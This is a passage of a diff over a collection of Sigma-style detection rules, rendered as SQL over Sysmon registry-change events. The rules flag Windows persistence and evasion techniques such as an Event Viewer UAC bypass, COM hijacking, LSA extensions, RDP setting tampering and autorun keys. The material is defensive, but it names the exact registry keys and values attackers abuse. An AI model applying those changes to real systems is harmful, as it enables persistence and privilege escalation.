"registry_set_aedebug_persistence.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "author": "frack113", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" 
+ "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut 
(@0xThiebaut), oscd.community, Cédric Hien", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE 
'%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' 
ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND 
Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", + "status": "test", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 
'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.persistence", - "attack.execution", "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Winget Admin Settings Modification", + "id": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence" ], "falsepositives": [ - "Unlikely" + "The event doesn't contain information about the type of change. 
False positives are expected with legitimate changes" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND Image LIKE '%\\\\winget.exe' ESCAPE '\\' AND TargetObject LIKE '\\\\REGISTRY\\\\A\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LocalState\\\\admin\\_settings' ESCAPE '\\')" ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_set_winget_admin_settings_tampering.yml" }, { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion" ], "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious 
images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Installers and updaters may set currently in use files for rename after a reboot." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE 
